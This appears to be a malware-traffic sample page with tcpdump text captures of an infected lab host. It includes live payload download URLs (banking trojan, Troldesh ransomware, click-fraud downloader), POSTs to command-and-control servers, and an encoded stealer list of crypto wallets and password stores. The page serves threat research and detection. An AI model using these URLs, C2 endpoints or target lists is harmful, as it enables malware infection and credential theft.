Text Example

GET /sim.o t-trade.net Financial Stock Banking Malware Trojan PCAP file download sample

2019-05-29 21:16:12.610658 IP 10.1.10.162.60446 > 185.219.42.154.80: Flags [P.], seq 649603156:649603684, ack 3701990316, win 16425, length 528: HTTP: GET /sim.o HTTP/1.1
E..8w.@…..
.
…*….P&.(T….P.@)….GET /sim.o HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Range: bytes=240615-
Unless-Modified-Since: Wed, 29 May 2019 23:56:47 GMT
If-Range: “10d200-58a0f88c11a17”
Host: t-trade.net
Connection: Keep-Alive

2019-05-29 21:16:36.990639 IP 10.1.10.162.60447 > 77.222.57.253.80: Flags [P.], seq 1839010927:1839011208, ack 1315819563, win 16425, length 281: HTTP: POST /index.php HTTP/1.1
E..Ax.@….m
.
.M.9….Pm..oNm.+P.@)/…POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: n500stoker.temp.swtest.ru
Content-Length: 109
Cache-Control: no-cache

J/.4/.=I.>:.>;.L/.I/.5/.>/.9/.>K.>8.N/.I/.;/./.?L.>>.><.>?.?N.(9.N/.8/.5/.4L.>3.?N.>>.>=.>2.(9.(9.(9.K/.> 2019-05-29 21:16:37.647544 IP 77.222.57.253.80 > 10.1.10.162.60447: Flags [P.], seq 42341:43801, ack 281, win 237, length 1460: HTTP J/.4/.=I.>:.>;.L/.I/.5/.>/.9/.>K.>8.N/.I/.;/./.?L.>>.><.>?.?N.(9.N/.8/.5/.4L.>3.?N.>>.>=.>2.(9.(9.(9.K/.>
2019-05-29 21:16:37.647544 IP 77.222.57.253.80 > 10.1.10.162.60447: Flags [P.], seq 42341:43801, ack 281, win 237, length 1460: HTTP
E …0@./..NM.9.

2019-05-29 21:16:45.383337 IP 10.1.10.162.60448 > 77.222.57.253.80: Flags [P.], seq 4169006147:4169006321, ack 1258956205, win 16425, length 174: HTTP: POST /index.php HTTP/1.1
E…~.@…..
.
.M.9.. .P.}.CK
%.P.@)L…POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: n500stoker.temp.swtest.ru
Content-Length: 43590
Cache-Control: no-cache

POST /prosper/index.php evaglobal.eu prosper.exe Malware PCAP file download Traffic Sample

2019-05-30 00:41:38.457600 IP 10.1.10.162.49185 > 10.1.10.224.80: Flags [P.], seq 1430869096:1430869520, ack 1051603559, win 16425, length 424: HTTP: GET /prosper.exe HTTP/1.1
E…..@…..
.
.
.
..!.PUITh>.2gP.@).$..GET /prosper.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:42:14.087418 IP 10.1.10.162.49186 > 149.56.22.192.80: Flags [P.], seq 3640301184:3640301460, ack 3223405560, win 64240, length 276: HTTP: POST /prosper/index.php HTTP/1.1
E..<..@…8.
.
..8…”.P…..!C.P…….POST /prosper/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: evaglobal.eu
Content-Length: 109
Cache-Control: no-cache

J/.4/.=I.>:.>;.L/.I/.5/.>/.9/.>K.>8.N/.I/.;/./.?L.>>.><.>?.?N.(9.N/.8/.5/.4L.>3.?N.>>.>=.>2.(9.(9.(9.K/.>
2019-05-30 00:42:15.211255 IP 149.56.22.192.80 > 10.1.10.162.49186: Flags [P.], seq 7301:8379, ack 276, win 30016, length 1078: HTTP
E .^..@.3..$.8..
.
..P.”.!|....P.u@....s.B.t$v.....4f....'a..'...Gx..].......!..\.H..Q"......kb..2...h.6....g.....~A?....JbW.GY.S...1..CiG..A.........U.....eY;...x...g.......X..*.....?.a~R..o.......a.O......8..Xe.._. ...-.....n....Rf1q ..e...$..,.;..f.e..Rxo.N.._. ..9..Lw.......I+R.U..,.~..[bc N....x..Obt. ..b.;...81Z...V.....;4X .._.<...|1c ..l....?^SY)..i.Y....W I....x....0f<..k....Xom.T..q....h. {/....c..[. +U....m..Re1I ..l....%Fi.H....x..TfeEi....,..|;.i...i.&D....i;..o....=;.i0.Gn..].Q...r[...".L.......?U...s/...n.#Ux..,...n\.&l..?..\X.....w.A....4.].q..f./...=.s...J....tjd.._. .N.a..j.HN....l.]...._r+..(...i..Y....,.PYU_..1......^v....U...…=LIR2u.J/..F..UI…”.0A..K……o.;nb……X|$r..Jyi...$..^..Yr….[.pr..>Z……… .o…k;…z.i.. .X5..:…….X9…….h..l,..L….{{ .z2..K’rn…X1..:….> .. ..f. ..<.7};..m…,…=’…h.’di#….o..Ndf….D….>.$%S….c…Yo.N.. .x..Tha.….d..T.y.*.hyYFb..Gs0…A.<..>^.w>..(.Ib..J.WR….#..Og..S….c…ho……o…{r.^….#..^yo.U….c..XytFY.._.
..;
2019-05-30 00:42:17.098581 IP 149.56.22.192.80 > 10.1.10.162.49186: Flags [P.], seq 4477439:4478073, ack 276, win 30016, length 634: HTTP
E ….@.3….8..
.
..P.”.e……P.u@p…mNoZWNrcG9pbnRzLG1iaGQuc3B2Y2hhaW4sbWJoZC55YW1sDQoud2FsbGV0DQp3YWxsZXRzXC53YWxsZXQNCndhbGxldC5kYXQNCndhbGxldHNcd2FsbGV0LmRhdA0KZWxlY3RydW0uZGF0DQp3YWxsZXRzXGVsZWN0cnVtLmRhdA0KU29mdHdhcmVcbW9uZXJvLXByb2plY3RcbW9uZXJvLWNvcmUNCndhbGxldF9wYXRoDQpCaXRjb2luXEJpdGNvaW4tUXQNCkJpdGNvaW5Hb2xkXEJpdGNvaW5Hb2xkLVF0DQpCaXRDb3JlXEJpdENvcmUtUXQNCkxpdGVjb2luXExpdGVjb2luLVF0DQpCaXRjb2luQUJDXEJpdGNvaW5BQkMtUXQNCiVBUFBEQVRBJVxFeG9kdXMgRWRlblwNCiVBcHBkYXRhJVxQc2krXHByb2ZpbGVzXA0KJUFwcGRhdGElXFBzaVxwcm9maWxlc1wNCjxyb3N0ZXItY2FjaGU+DQo8L3Jvc3Rlci1jYWNoZT4NCjxqaWQgdHlwZT0iUVN0cmluZyI+DQo8cGFzc3dvcmQgdHlwZT0iUVN0cmluZyI+DQo8L3Bhc3N3b3JkPg==
0

2019-05-30 00:42:21.556290 IP 10.1.10.162.49186 > 149.56.22.192.80: Flags [P.], seq 276:445, ack 4478073, win 64240, length 169: HTTP: POST /prosper/index.php HTTP/1.1
E…..@…2.
.
..8…”.P…..e.pP…. ..POST /prosper/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: evaglobal.eu
Content-Length: 44579
Cache-Control: no-cache

copticorphans.org Ransomware Malware PCAP file download Traffic Sample

https://www.virustotal.com/fr/file/c7a14d6a1b72355952781787317f345753dab98c43b80127db2de62a89f0ce10/analysis/
SHA256: c7a14d6a1b72355952781787317f345753dab98c43b80127db2de62a89f0ce10

Nom du fichier : 1c.jpg
Ratio de détection : 32 / 72
Date d’analyse : 2019-05-29 14:27:51 UTC (il y a 16 heures, 28 minutes)

2019-05-29 21:44:21.090952 IP 10.1.10.162.49185 > 93.191.156.122.80: Flags [P.], seq 2960318675:2960319109, ack 288044427, win 16425, length 434: HTTP: GET /blogs/media/1c.jpg HTTP/1.1
E…..@….n
.
.]..z.!.P.r…+5.P.@)E…GET /blogs/media/1c.jpg HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: vision4cph.com
Connection: Keep-Alive

2019-05-29 21:44:21.204625 IP 93.191.156.122.80 > 10.1.10.162.49185: Flags [P.], seq 1461:2413, ack 434, win 123, length 952: HTTP
E …A@.2…]..z
.
..P.!.+;?.r..P..{.4..hostname

The site you are trying to reach could be suspended, deleted or DNS could be incorrect

This domain is hosted by UnoEuro

SupportControlpanel

WebhotelDomains


2019-05-29 21:44:21.565707 IP 10.1.10.162.49187 > 94.231.106.23.80: Flags [P.], seq 500259223:500259593, ack 2801741812, win 16425, length 370: HTTP: GET /splash.css HTTP/1.1
E…..@…..
.
.^.j..#.P..Y…/.P.@)._..GET /splash.css HTTP/1.1
Accept: /
Referer: http://vision4cph.com/blogs/media/1c.jpg
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: splash.unoeuro.com
Connection: Keep-Alive

2019-05-29 21:44:21.566770 IP 10.1.10.162.49186 > 94.231.106.23.80: Flags [P.], seq 422854994:422855366, ack 3696602173, win 16425, length 372: HTTP: GET /hostedby.png HTTP/1.1
E…..@…..
.
.^.j..”.P.4AR.U.=P.@).T..GET /hostedby.png HTTP/1.1
Accept: /
Referer: http://vision4cph.com/blogs/media/1c.jpg
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: splash.unoeuro.com
Connection: Keep-Alive

2019-05-29 21:45:48.303893 IP 10.1.10.162.49197 > 67.205.132.158.443: Flags [P.], seq 730561231:730561361, ack 3595014057, win 16425, length 130
E…..@…..
.
.C….-..+.z..G..P.@).p……}…y…5i(…05..J#
…27..;Q.fmV.sg…../.5…
….. .
.2.8…….8…………..copticorphans.org……….
…………..
2019-05-29 21:45:48.331867 IP 67.205.132.158.443 > 10.1.10.162.49197: Flags [P.], seq 2921:3577, ack 130, win 237, length 656
E ….@.4.Z4C…
.
….-.G..+.{QP…$….20190529060000Z….20190605060000Z0.. .H………….dK..14.,?….3.$.c..eWa./..v..>r .”f.U.4K,. M..di.Z…q……t……2…v…..t…@k……..rkP…z.b.0.c....m..x..:s..rg_%;O.'...f*:....F~.ToN.....y.#..!+..:..^h.J..9...."..q.......@..f...l.v.....y.?.(..g..../...)...Ph....|....e<!5.C.h.S....c...r._T....|....K...G...A.F....d.d...6o.wN.N.......~..!....c.L..K.z...6?.q.UO.)^^Y......R....Kw\{...PIs...S'.N..+eD.(....7........jhh.cS.F.I^.yu.P..x..#.j.|..k.x..3e....0ZUk=7|F.V....'.%...%....f"2.n...T...^.,...^..8..Y2. J.....[.\....=.P3-....=....*V.*@.%.....go<.up..h.6g 1.........}UH,}5..*7{#....m..B..v..:+....t}a....:0.4......+ CW~.....&...._......... 2019-05-29 21:45:48.342006 IP 10.1.10.162.49197 > 67.205.132.158.443: Flags [P.], seq 130:264, ack 3577, win 16425, length 134 E.....@..... . .C....-..+.{Q.G..P.@)........F...BA....C............E:..z....^.w.'.....qW.K.V.L=T;/t......_..h....U...........0.&...0ZZ%.^s8z…bx9…W.m…=hr..L.ZK….%…
2019-05-29 21:45:48.360582 IP 67.205.132.158.443 > 10.1.10.162.49197: Flags [P.], seq 3577:3636, ack 264, win 245, length 59
E .c..@.4..C…
.
….-.G..+.{.P…h………….0S.E…….5….o..R.$..LFPR….3.s.”\,”!.”r.@
..
2019-05-29 21:45:48.384865 IP 10.1.10.162.49197 > 67.205.132.158.443: Flags [P.], seq 264:589, ack 3636, win 16410, length 325
E..m..@…..
.

TROLDESH Ransomware PCAP Download Traffic Sammple undergroundlabsuk.com 185.119.174.45

URLhaus Database

URLhaus tries to identify the malware associated with the payload served by a certain malware URL. In case URLhaus is able to identify the associated malware family, the payload will be tagged accordingly (field signature). The page below gives you an overview on payloads that URLhaus has identified as Ransomware.Troldesh.

2019-05-29 21:53:52.091291 IP 10.1.10.162.49184 > 185.119.174.45.80: Flags [P.], seq 1195198762:1195199227, ack 4032472939, win 16425, length 465: HTTP: GET /wp-content/themes/Divi/et-pagebuilder/1c.j HTTP/1.1
E…..@…{.
.
..w.-. .PG=I*.Z.kP.@)….GET /wp-content/themes/Divi/et-pagebuilder/1c.j HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: undergroundlabsuk.com
Connection: Keep-Alive

2019-05-29 21:53:55.597305 IP 185.119.174.45.80 > 10.1.10.162.49184: Flags [P.], seq 1:406, ack 465, win 123, length 405: HTTP: HTTP/1.1 301 Moved Permanently
E …P@.1….w.-
.
..P. .Z.kG=J.P..{….HTTP/1.1 301 Moved Permanently
Date: Thu, 30 May 2019 01:53:52 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: https://undergroundlabsuk.com/wp-content/themes/Divi/et-pagebuilder/1c.j
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2019-05-29 21:53:55.891821 IP 185.119.174.45.80 > 10.1.10.162.49184: Flags [P.], seq 1:406, ack 465, win 123, length 405: HTTP: HTTP/1.1 301 Moved Permanently
E …Q@.1….w.-
.
..P. .Z.kG=J.P..{….HTTP/1.1 301 Moved Permanently
Date: Thu, 30 May 2019 01:53:52 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: https://undergroundlabsuk.com/wp-content/themes/Divi/et-pagebuilder/1c.j
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2019-05-29 21:53:55.902075 IP 10.1.10.162.49185 > 185.119.174.45.443: Flags [P.], seq 3137670173:3137670307, ack 1653186217, win 16425, length 134
E…..@…}/
.
..w.-.!……b…P.@)…………}…5b…….;?.NE.Z..dp…!………./.5…
….. .
2019-05-29 21:54:12.260958 IP 10.1.10.162.49192 > 185.119.174.45.443: Flags [P.], seq 2305352218:2305352384, ack 1046836851, win 16425, length 166
E…..@…|.
.
..w.-.(…h..>evsP.@)……………5r..”9..a……..v…M.L…+.m .l.Z&5…?.g5…[..p.@..2..9.q?…./.5… ….. . .2.8…….<…………..undergroundlabsuk.com………. ………….. 2019-05-29 21:54:12.261557 IP 10.1.10.162.49191 > 185.119.174.45.443: Flags [P.], seq 3481323599:3481323765, ack 128666795, win 16425, length 166 E…..@…|. . ..w.-.’…..O..L.P.@).z…………..5r|W^..Xh..vt.3B..?…..]&.p.. .l.Z&5…?.g5…[..p.@..2..9.q?…./.5… ….. . .2.8…….<…………..undergroundlabsuk.com………. ………….. 2019-05-29 21:54:12.263148 IP 10.1.10.162.49194 > 185.119.174.45.443: Flags [P.], seq 1173719525:1173719691, ack 3012160489, win 16425, length 166 E…..@…|. . ..w.-…E…….P.@). …………..5r..7.0…i….xF.d…5……. .l.Z&5…?.g5…[..p.@..2..9.q?…./.5… ….. . .2.8…….<…………..undergroundlabsuk.com………. ………….. 2019-05-29 21:54:12.271973 IP 10.1.10.162.49193 > 185.119.174.45.443: Flags [P.], seq 1172014663:1172014829, ack 773836195, win 16425, length 166 E…..@…|. . ..w.-.)..E..G….P.@)…………….5r.=….Cc.5Rqw..j…”…R|.C. .l.Z&5…?.g5…[..p.@..2..9.q?…./.5… ….. . .2.8…….<…………..undergroundlabsuk.com………. ………….. 2019-05-29 21:54:12.313725 IP 185.119.174.45.443 > 10.1.10.162.49185: Flags [P.], seq 37350:38810, ack 769, win 140, length 1460 E ….@.1….w.- . ….!b.0…..P…./..a^?…”….Y..p…:.’.a.s.K.Q .|..u….u..m.6..1g.gC(ZL.!S.1.j. ……?.O.z..\y.5..p…H/…&8….k.Q..Y..6…v…..r…L.x.P:g..J.w(Wn…….&.#”.f…….r......{f....&...5...).....n....,2..g.c..c..v….wH#…. Lv.K.i…f….n<..Q….<%.k……k...]..).*.gQ.D.5z....xZ..o{.....-mc...........].0o......S.|..".P...z...B.<FmL.....1.~C...8..pW......H.W........ax..[+ ...H..L69..l%h#….P..A”..+..2/.MBp[r.S……s..:R.y..grRs.b……R..)t..2..D.S..&/.y.l.5…/.”B..Y.&H\b….qC.6.…k.v..[…]..c….1……>…0.J.-.>u.. .dk……….j……..;y..%..?……….,b..z Z}s.;.j..I<..|4…+…..R.{h”.4Y…S,pOO.”…1….,..KF.N.3>,..D;),…Rm.8.G…h.-.S-^.5…K.ht… …v..n…A….t..7….’?…%…?
…….k.<..9..9..D.m..U.I(.. E….
&…lGS..oV..eJ.G.o..Vj.P …M..RiNn...d6.X.o.z..e;………M.dT.v….a…3g…r4&Hh.f…………\H.s.a.”<…s.'{$…Gj.d…(.7..&……e3.1…..E}”5I|..T.$2[..O.x..K…E.~………. ..F….P………..-…9F{…./../..”….N..’…+…. |5.r…WYZ…..l.d..}.).KZ…Z………f.J.F4….{.X.d…~.M..f=;…M….…v…ju….Lz…zA..x-.x./..P.2;~……E].h.O.t8..v....=.......FhR......l.y...…y.U……..z….)u….P..K..nZ!….O…………|..rlJ……m…..’…..’.1…..^oI<..i..N.X…q3g..7.:..-d~H}q…}.vP..G..:M.. …..K0q..2. ……..2s+..g%.0…o.M..$…..U]…..=…,j.z..’…{..
2019-05-29 21:54:12.357676 IP 185.119.174.45.443 > 10.1.10.162.49194: Flags [P.], seq 1:146, ack 166, win 123, length 145
E ….@.1.I..w.-
.
….….E…P..{.......Q...M...B.. s..#.......o...]......./wt> .l.Z&5...?.g5...[..p.@..2..9.q?.....................0.;z........B.H........mZ.7...Z..UT.+.B......q..s 2019-05-29 21:54:12.358112 IP 10.1.10.162.49194 > 185.119.174.45.443: Flags [P.], seq 166:225, ack 146, win 16388, length 59 E..c..@...}J . ..w.-.*..E......zP.@...............0.6g.$..p.QV'=.|&...Z.b…..xU4}v…… ^O..(.). 2019-05-29 21:54:12.361324 IP 185.119.174.45.443 > 10.1.10.162.49192: Flags [P.], seq 1:146, ack 166, win 123, length 145 E ….@.1..:.w.- . . ..w.-./……@(U.P.@.l^…………..t.Z.A.%…… .E… ]m…… …i…K.L…A…K..!…….S…..f..-1..=….]..7 …5…&….>R<|Op….B].k.X…rC.D..DC.2..)n.Kh..f.$e..R.j.1..?'<.*...!...I.~.....N..Ks,n… Qz.….>..’].%d8..!.p..G.1..m.@@….yE.~B.2 c.'......80{.l.....xW.C...>....>.y.Gg,.0B..G3.."{i..i:.<...<u....w....6w.C...F.S.#_..1P..W..1.....J"R.M..3....."Kv^l.T..k.…….R..qD..^<.A.^………p.1Y…q..K….j.;P….6.
.f……..v……../..P.T2..s….V.s.3.PBv.:…e.l….
2019-05-29 21:54:12.892573 IP 10.1.10.162.49203 > 185.119.174.45.443: Flags [P.], seq 3572732553:3572732719, ack 4054164407, win 16425, length 166
E….O@…|.
.
..w.-.3……….P.@)g……………5s..y…8….,j.g..5…l-.F>.Q .l.Z&5…?.g5…[..p.@..2..9.q?…./.5…
….. .
.2.8…….<…………..undergroundlabsuk.com………. ………….. 2019-05-29 21:54:12.954592 IP 10.1.10.162.49204 > 185.119.174.45.443: Flags [P.], seq 3200671630:3200671796, ack 2230721411, win 16425, length 166
…skipping…
Expires: Thu, 30 May 2019 13:55:28 GMT
Date: Thu, 30 May 2019 01:55:34 GMT
Connection: keep-alive

0…
……0…. +…..0……0…0…L0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X3..20190529221100Z0u0s0K0 ..+……..~.j.r….. dl..-q.]...Jjc.}....9..Ee.........r.U"..PW.H.&..>.....20190529220000Z....20190605220000Z0.. *.H.............~.z.L...8!.(....#.,q..{…8.”..K.1@.0.xx…t..&… .In.i..D8.1..
.g..A7x..S……..8.G}.. ...i.q.f.....E9. 9.N...s.....jd.cS.f@..qcP!..3.......hy.?UZN. oV...-.}:b...B..,Q....W.....P....>v..=-M}..n#......x....,,.i....... .......w....v..:&…….^.?……
2019-05-29 21:55:35.085480 IP 204.237.142.208.80 > 10.1.10.162.49293: Flags [P.], seq 1:914, ack 255, win 237, length 913: HTTP: HTTP/1.1 200 OK
E ….@.6…….
.
..P..Bwp…..P…….HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 527
ETag: “C911F69DFEADAC3CC6E8285B7E18A61BF26D22F5E74E9A35FE21376765EAA26A”
Last-Modified: Wed, 29 May 2019 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=43194
Expires: Thu, 30 May 2019 13:55:28 GMT
Date: Thu, 30 May 2019 01:55:34 GMT
Connection: keep-alive

0…
……0…. +…..0……0…0…L0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X3..20190529221100Z0u0s0K0 ..+……..~.j.r….. dl..-q.]...Jjc.}....9..Ee.........r.U"..PW.H.&..>.....20190529220000Z....20190605220000Z0.. *.H.............~.z.L...8!.(....#.,q..{…8.”..K.1@.0.xx…t..&… .In.i..D8.1..
.g..A7x..S……..8.G}.. ...i.q.f.....E9. 9.N...s.....jd.cS.f@..qcP!..3.......hy.?UZN. oV...-.}:b...B..,Q....W.....P....>v..=-M}..n#......x....,,.i....... .......w....v..:&…….^.?……
2019-05-29 21:55:52.309807 IP 10.1.10.162.49294 > 185.55.224.150.80: Flags [P.], seq 763839603:763839890, ack 2187406094, win 16425, length 287: HTTP: GET /favicon.ico HTTP/1.1
E..G..@…?K
.
..7…..P-.Ds.a+.P.@). ..GET /favicon.ico HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: westap.ir
Connection: Keep-Alive

@getBootstrapCDN TWITTER Malware Trojan Downloader Click Fraud PCAP File Download Traffic Sample batdongsantaynambo.com.vn

2019-05-29 22:03:15.716964 IP 10.1.10.162.49185 > 103.221.223.17.80: Flags [P.], seq 319437355:319437820, ack 122938386, win 16425, length 465: HTTP: GET /wp-content/themes/willgroup/inc/acf/as HTTP/1.1
E…..@…..
.
.g….!.P.
:+.S..P.@)4…GET /wp-content/themes/willgroup/inc/acf/as HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: batdongsantaynambo.com.vn
Connection: Keep-Alive

2019-05-29 22:03:16.670058 IP 103.221.223.17.80 > 10.1.10.162.49185: Flags [P.], seq 7301:8643, ack 465, win 22, length 1342: HTTP
E .fQc..)..}g…
2019-05-29 22:03:16.765568 IP 10.1.10.162.49197 > 204.237.142.161.80: Flags [P.], seq 3885137682:3885138158, ack 3673702138, win 16425, length 476: HTTP: GET /button/st_insights.js?publisher=4d48b7c5-0ae3-43d4-bfbe-3ff8c17a8ae6&product=simpleshare HTTP/1.1
E…..@…..
.
……-.P……>.P.@)~j..GET /button/st_insights.js?publisher=4d48b7c5-0ae3-43d4-bfbe-3ff8c17a8ae6&product=simpleshare HTTP/1.1
Accept: /
Referer: http://batdongsantaynambo.com.vn/wp-content/themes/willgroup/inc/acf/as
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: w.sharethis.com
Connection: Keep-Alive

2019-05-29 22:03:16.791424 IP 209.197.3.15.80 > 10.1.10.162.49196: Flags [P.], seq 4828:5890, ack 449, win 60, length 1062: HTTP
E .N.(@.6…….
.
..P.,..E..d3&P..<….r…….c…ZW.1}.K=Yrnx..{….@..#.s.b.(g.#.$…]..X…/u.876,.W…Y..3j…..>g.j./.”-.w..d…>V..].|……..>x.R…….?…./#0.H..N.g.R’.Xp.H…-.a…..B…..i..N./t..Y….f..L@……..Z…d$..{HZ.PH.H@6.pRT..V…J{.T…&..e…n]……….5…|..WX.#W.:..)…B!.#%Y+……..0…..4….&..Y.Fa…f……e. ..~..>…>b…….]……f…Pi.HL6..#.
..F……v…bL.e………t&U.3MJ2.=bR…V..)<8d1E.p..P…..t..a…..I.v.%..I..v..8..!!X.7.^..:…….O.@..x………..#…..L..’…q.M..H.(…sw….<.9…_.1….( J.&….~>.R.@.yB…..R ..|….GBj/B![…+.1O?..5.. %……..;!…G…zHH…k..$^.Y<..L.,..Kd.;..T ^7..ZFr7….Ibs..x.Y.”3..30.9…9.#&l.A..U).t.R|…. -!u..w…..]..n.V.iW..RB..VVMyq.5.Q..t..r.b&1..I….@…d..”.+…N…,.r$!.X/.mE..9..^…….6.\m.j..”P.!!.X..e…(!……’….. ..{bu..K..’..vp. l………..L..vS..`….H.Acv…. ……$.. ..>.r…..’$……Yf… i…a eIn.b…7.3n……V=.c{.DV=(..l ….Mo
.. …%………(….x…OZs….i……….
2019-05-29 22:03:16.793379 IP 209.197.3.15.80 > 10.1.10.162.49196: Flags [P.], seq 1:448, ack 449, win 60, length 447: HTTP: HTTP/1.1 200 OK
E …$@.6..U….
.
..P.,..2..d3&P..<.I..HTTP/1.1 200 OK
Date: Thu, 30 May 2019 02:03:16 GMT
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: “1544639719”
Content-Encoding: gzip
Content-Length: 5442
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 12 Dec 2018 18:35:19 GMT
X-Hello-Human: Say hello back! @getBootstrapCDN on Twitter

2019-05-29 22:03:17.300171 IP 10.1.10.162.49186 > 103.221.223.17.80: Flags [P.], seq 456:903, ack 5552, win 16425, length 447: HTTP: GET /wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1
E…..@….x
.
.g….”.PXQ?.Zb..P.@)….GET /wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1
Accept: /
Referer: http://batdongsantaynambo.com.vn/wp-content/themes/willgroup/inc/acf/as
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: batdongsantaynambo.com.vn
Connection: Keep-Alive

2019-05-29 22:03:17.305502 IP 10.1.10.162.49196 > 209.197.3.15.80: Flags [P.], seq 449:894, ack 5890, win 16425, length 445: HTTP: GET /font-awesome/4.3.0/fonts/fontawesome-webfont.eot? HTTP/1.1
E…..@…..
.
……,.P.d3&..I.P.@).W..GET /font-awesome/4.3.0/fonts/fontawesome-webfont.eot? HTTP/1.1
Accept: /
Referer: http://batdongsantaynambo.com.vn/wp-content/themes/willgroup/inc/acf/as
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: maxcdn.bootstrapcdn.com
Connection: Keep-Alive

2019-05-29 22:03:20.996939 IP 10.1.10.162.49227 > 103.221.223.17.443: Flags [P.], seq 469823780:469823918, ack 3162838577, win 16425, length 138
E….|@….8
.
.g….K…..$…1P.@)…………….5.~.&..-“a[….. …uB.@g.?E:G…./.5…
….. .
.2.8…….@…………..batdongsantaynambo.com.vn……….
…………..
2019-05-29 22:03:21.000153 IP 10.1.10.162.49226 > 103.221.223.17.443: Flags [P.], seq 1306475388:1306475526, ack 1356580027, win 16425, length 138
E….~@….6
.
.g….J..M.;|P…P.@)…………….5…{..P..+.K3……k-I…..G…../.5…
….. .
.2.8…….@…………..batdongsantaynambo.com.vn……….
…………..
2019-05-29 22:03:21.267277 IP 10.1.10.162.49239 > 104.76.198.161.443: Flags [P.], seq 1456137481:1456137622, ack 2445346460, win 16425, length 141
E…..@…./
.
